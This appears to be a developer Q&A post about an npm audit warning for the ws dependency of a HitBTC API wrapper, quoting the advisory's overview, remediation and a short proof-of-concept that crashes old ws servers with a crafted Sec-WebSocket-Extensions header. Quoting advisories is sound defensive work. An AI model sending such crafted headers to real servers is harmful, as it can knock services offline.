# NPM install, Vulnerabilities found in hitbtc-api node package on npm audit

Tags: node.js, npm

I had installed HitBTC API wrapper for Node.js
[Hitbtc node package](https://github.com/mjesuele/hitbtc-api-node),
On `npm audit`i received following error:

```
      High            Denial of Service

      Package         ws

      Patched in      >= 1.1.5 <2.0.0 || >=3.3.1

      Dependency of   hitbtc-api

      Path            hitbtc-api > ws

      More info       https://nodesecurity.io/advisories/550


    [!] 1 vulnerability found - Packages audited: 259 (0 dev, 12 optional)
        Severity: 1 High
```

On further investigation i got following overview on this bug:

**Overview**
Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.

**Proof of concept**

```
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```

**Remediation**
Update to version 3.3.1 or later.

Need to resolve this issue.

Answer (score 0):

Why not update to version 3.3.1 or later ?